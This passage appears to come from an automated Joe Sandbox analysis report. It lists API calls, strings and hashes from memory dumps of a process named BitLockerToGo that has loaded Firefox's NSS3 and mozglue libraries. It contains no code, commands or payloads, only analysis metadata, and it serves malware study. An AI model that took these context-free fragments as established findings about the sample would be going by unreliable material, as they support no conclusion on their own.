                                                                                                                                                      • sqlite3_mprintf.NSS3(snippet), ref: 6C8FEF3C
                                                                                                                                                      • sqlite3_mprintf.NSS3(offsets), ref: 6C8FEFE4
                                                                                                                                                        • Part of subcall function 6C9BDFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C895001,?,00000003,00000000), ref: 6C9BDFD7
                                                                                                                                                      • sqlite3_mprintf.NSS3(matchinfo), ref: 6C8FF087
                                                                                                                                                      • sqlite3_mprintf.NSS3(matchinfo), ref: 6C8FF129
                                                                                                                                                      • sqlite3_mprintf.NSS3(optimize), ref: 6C8FF1D1
                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C8FF368
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
                                                                                                                                                      • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                                                                                                                      • API String ID: 2518200370-449611708
                                                                                                                                                      • Opcode ID: 73cc18a49e9c773503e37405adea16be0f0964b7c73d703a623033a5e8334da0
                                                                                                                                                      • Instruction ID: 40fd2a6347834848842897bfeac5924522f3bd41b2f349cbb0d779435f1c3a4e
                                                                                                                                                      • Opcode Fuzzy Hash: 73cc18a49e9c773503e37405adea16be0f0964b7c73d703a623033a5e8334da0
                                                                                                                                                      • Instruction Fuzzy Hash: 900212B5B043018BE7199E399D8572B36F27BD4348F18893CD86A87B00EB74E847C792
                                                                                                                                                      APIs
                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C87E7B8), ref: 6C80FF81
                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C87E7B8), ref: 6C81022D
                                                                                                                                                      • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C810240
                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C87E768), ref: 6C81025B
                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C87E768), ref: 6C81027B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalSection$EnterLeave$AllocVirtual
                                                                                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                      • API String ID: 618468079-3577267516
                                                                                                                                                      • Opcode ID: f76d24767fbd1eb5afc64e4d2bd1e6ca9b22fda56d0adbf3c213d31f7b452987
                                                                                                                                                      • Instruction ID: 73f806ab58ba0a838c3840cb6d42f6057e75bc1366d381a245d1116819d7359e
                                                                                                                                                      • Opcode Fuzzy Hash: f76d24767fbd1eb5afc64e4d2bd1e6ca9b22fda56d0adbf3c213d31f7b452987
                                                                                                                                                      • Instruction Fuzzy Hash: C3C2B8716097428FD724CF28CA80716BBE1BF85328F28CA6DE4698FB95D771D851CB81
                                                                                                                                                      APIs
                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C89ED0A
                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C89EE68
                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C89EF87
                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C89EF98
                                                                                                                                                      Strings
                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C89F492
                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C89F483
                                                                                                                                                      • database corruption, xrefs: 6C89F48D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _byteswap_ulong
                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                      • API String ID: 4101233201-598938438
                                                                                                                                                      • Opcode ID: 93487c099d461e0402440b13b2bab26149446cd40fa299e07552d3ef7072218b
                                                                                                                                                      • Instruction ID: 6eb77b36546bba9e62e4d4923c7d86bcfa10caccf928802ee624d434f76c7b17
                                                                                                                                                      • Opcode Fuzzy Hash: 93487c099d461e0402440b13b2bab26149446cd40fa299e07552d3ef7072218b
                                                                                                                                                      • Instruction Fuzzy Hash: 03621630A04245CFEB28CF6CC64479ABBB1BF55318F18499DE8465BB92D735EC86CB90
                                                                                                                                                      APIs
                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C87E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D4F2
                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C87E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D50B
                                                                                                                                                        • Part of subcall function 6C7FCFE0: EnterCriticalSection.KERNEL32(6C87E784), ref: 6C7FCFF6
                                                                                                                                                        • Part of subcall function 6C7FCFE0: LeaveCriticalSection.KERNEL32(6C87E784), ref: 6C7FD026
                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D52E
                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C87E7DC), ref: 6C81D690
                                                                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C81D6A6
                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C87E7DC), ref: 6C81D712
                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C87E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D751
                                                                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C81D7EA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                      • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                                                      • API String ID: 2690322072-3894294050
                                                                                                                                                      • Opcode ID: 54f8285df887f373432cbbf5f3a15470946689170bc6bb1e03e2f16dae8c540c
                                                                                                                                                      • Instruction ID: 9f159dfdb69e88255d3c52130d8f6a768668dff4ea01d39598b5d4f713fa2219
                                                                                                                                                      • Opcode Fuzzy Hash: 54f8285df887f373432cbbf5f3a15470946689170bc6bb1e03e2f16dae8c540c
                                                                                                                                                      • Instruction Fuzzy Hash: 3491B371A087168FD736CF28C29476AB7E1EB86318F144D2ED55A87F81E734E844CB92
                                                                                                                                                      APIs
                                                                                                                                                      • PK11_PubDeriveWithKDF.NSS3 ref: 6C940F8D
                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C940FB3
                                                                                                                                                      • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C941006
                                                                                                                                                      • PK11_FreeSymKey.NSS3(?), ref: 6C94101C
                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C941033
                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C94103F
                                                                                                                                                      • PK11_FreeSymKey.NSS3(00000000), ref: 6C941048
                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C94108E
                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C9410BB
                                                                                                                                                      • memcpy.VCRUNTIME140(?,00000006,?), ref: 6C9410D6
                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C94112E
                                                                                                                                                        • Part of subcall function 6C941570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C9408C4,?,?), ref: 6C9415B8
                                                                                                                                                        • Part of subcall function 6C941570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C9408C4,?,?), ref: 6C9415C1
                                                                                                                                                        • Part of subcall function 6C941570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C94162E
                                                                                                                                                        • Part of subcall function 6C941570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C941637
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1510409361-0
                                                                                                                                                      • Opcode ID: d89be228e429194fb8acf6b4ef1628093822e22aabc1cc689e114911e8220a82
                                                                                                                                                      • Instruction ID: 4d0c40a16f8dafa93b35e66ca60c376d67ce438c65e2b693c32a825b0781366b
                                                                                                                                                      • Opcode Fuzzy Hash: d89be228e429194fb8acf6b4ef1628093822e22aabc1cc689e114911e8220a82
                                                                                                                                                      • Instruction Fuzzy Hash: E171DEB1A00205CFDB04CFA5DD80AAABBB4FF5931CF148629E91997B11E731E964CB90
                                                                                                                                                      APIs
                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C911C6F,00000000,00000004,?,?), ref: 6C966C3F
                                                                                                                                                        • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C911C6F,00000000,00000004,?,?), ref: 6C966C60
                                                                                                                                                      • PR_ExplodeTime.NSS3(00000000,6C911C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C911C6F,00000000,00000004,?,?), ref: 6C966C94
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                      • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                      • API String ID: 3534712800-180463219
                                                                                                                                                      • Opcode ID: a21fcfdb4a8bba58f59df0602d1c6e94a2634d2f05e1978a70b25772735dd703
                                                                                                                                                      • Instruction ID: e04075e240452f4370f46a9e858a270060d21253a768c00ac071fd6b41b15199
                                                                                                                                                      • Opcode Fuzzy Hash: a21fcfdb4a8bba58f59df0602d1c6e94a2634d2f05e1978a70b25772735dd703
                                                                                                                                                      • Instruction Fuzzy Hash: 42514B72B016494FD71CCDADDC626DABBDAABE4310F48C23AE442DBB81D638D906C751
                                                                                                                                                      APIs
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000002,?,6C9CCF46,?,6C89CDBD,?,6C9CBF31,?,?,?,?,?,?,?), ref: 6C8AB039
                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C9CCF46,?,6C89CDBD,?,6C9CBF31), ref: 6C8AB090
                                                                                                                                                      • sqlite3_free.NSS3(?,?,?,?,?,?,6C9CCF46,?,6C89CDBD,?,6C9CBF31), ref: 6C8AB0A2
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,6C9CCF46,?,6C89CDBD,?,6C9CBF31,?,?,?,?,?,?,?,?,?), ref: 6C8AB100
                                                                                                                                                      • sqlite3_free.NSS3(?,?,00000002,?,6C9CCF46,?,6C89CDBD,?,6C9CBF31,?,?,?,?,?,?,?), ref: 6C8AB115
                                                                                                                                                      • sqlite3_free.NSS3(?,?,?,?,?,?,6C9CCF46,?,6C89CDBD,?,6C9CBF31), ref: 6C8AB12D
                                                                                                                                                        • Part of subcall function 6C899EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C8AC6FD,?,?,?,?,6C8FF965,00000000), ref: 6C899F0E
                                                                                                                                                        • Part of subcall function 6C899EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C8FF965,00000000), ref: 6C899F5D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3155957115-0
                                                                                                                                                      • Opcode ID: 82cb940f48e134bc881c7bdc67a467d715c6ea88c7edcab51afab4de02a075e0
                                                                                                                                                      • Instruction ID: 0cc00af5f762f31284ab362c81411dbe2ef1c083e7840c6072bceec66f320846
                                                                                                                                                      • Opcode Fuzzy Hash: 82cb940f48e134bc881c7bdc67a467d715c6ea88c7edcab51afab4de02a075e0
                                                                                                                                                      • Instruction Fuzzy Hash: F991D470A0470A8FDB29CFA9CA84ABBB7B1FF45304F144A2DD41697A50E735E846CB51
                                                                                                                                                      APIs
                                                                                                                                                      • PR_CallOnce.NSS3(6CA714E4,6C9DCC70), ref: 6CA28D47
                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6CA28D98
                                                                                                                                                        • Part of subcall function 6C900F00: PR_GetPageSize.NSS3(6C900936,FFFFE8AE,?,6C8916B7,00000000,?,6C900936,00000000,?,6C89204A), ref: 6C900F1B
                                                                                                                                                        • Part of subcall function 6C900F00: PR_NewLogModule.NSS3(clock,6C900936,FFFFE8AE,?,6C8916B7,00000000,?,6C900936,00000000,?,6C89204A), ref: 6C900F25
                                                                                                                                                      • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6CA28E7B
                                                                                                                                                      • htons.WSOCK32(?), ref: 6CA28EDB
                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6CA28F99
                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6CA2910A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                                                                                      • String ID: %u.%u.%u.%u
                                                                                                                                                      • API String ID: 1845059423-1542503432
                                                                                                                                                      • Opcode ID: ff342b51fff69579031f2b9abff4cd37672bfc74185a44b56b218b3092f7eb82
                                                                                                                                                      • Instruction ID: 942fafb744a3ba14639f37aa0c2ad5006597e18c53ebd59f47f7926189486672
                                                                                                                                                      • Opcode Fuzzy Hash: ff342b51fff69579031f2b9abff4cd37672bfc74185a44b56b218b3092f7eb82
                                                                                                                                                      • Instruction Fuzzy Hash: A0027A329052758FDB188F2AC568766BBB2EF42304F1DC25EDC915BAD1C339D989C790
                                                                                                                                                      APIs
                                                                                                                                                      • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C842C31
                                                                                                                                                      • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C842C61
                                                                                                                                                        • Part of subcall function 6C7F4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C7F4E5A
                                                                                                                                                        • Part of subcall function 6C7F4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C7F4E97
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C842C82
                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C842E2D
                                                                                                                                                        • Part of subcall function 6C8081B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C8081DE
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                                                                      • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                                                      • API String ID: 801438305-4149320968
                                                                                                                                                      • Opcode ID: 1b12a875881d29122a30a4d504fd22471b861fdbe19aa639b45068ac0d54df03
                                                                                                                                                      • Instruction ID: 4e019622f5848ad628e4ae33f09385c69f9f69666b810df909d70b2f7fe2f871
                                                                                                                                                      • Opcode Fuzzy Hash: 1b12a875881d29122a30a4d504fd22471b861fdbe19aa639b45068ac0d54df03
                                                                                                                                                      • Instruction Fuzzy Hash: 8091C0706087488FD734CF28C58469EB7E0AFC9358F508D2EE59A87751EB34D949CB92
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: $-$0$0$1$8$9$@
                                                                                                                                                      • API String ID: 0-3654031807
                                                                                                                                                      • Opcode ID: 6a88fdf654d8dbe6621f1ccbcbedb2f3b03023b5f76542846fda0e9c797dadea
                                                                                                                                                      • Instruction ID: ce2ded33d5db3fa4dc377e4a4fd2a5cdc7e22ebdf8c121633010320889409092
                                                                                                                                                      • Opcode Fuzzy Hash: 6a88fdf654d8dbe6621f1ccbcbedb2f3b03023b5f76542846fda0e9c797dadea
                                                                                                                                                      • Instruction Fuzzy Hash: EB62BE7150C3458FD701CE29C2D079ABBE2AFA6358F184A2DE4F54BB51D3359886CB8A
                                                                                                                                                      APIs
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA2D086
                                                                                                                                                      • PR_Malloc.NSS3(00000001), ref: 6CA2D0B9
                                                                                                                                                      • PR_Free.NSS3(?), ref: 6CA2D138
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeMallocstrlen
                                                                                                                                                      • String ID: >
                                                                                                                                                      • API String ID: 1782319670-325317158
                                                                                                                                                      • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                      • Instruction ID: 9a2925b5d8b55d2dd56de42582dff6a0a0f1a916b48e7dd6fb1e5fe2201b8673
                                                                                                                                                      • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                      • Instruction Fuzzy Hash: 61D11672F456760BFB24487D88613EAA7938B42378F6C4329D5619BBE6E61DC8C3C341
                                                                                                                                                      APIs
                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,?), ref: 6C868A4B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
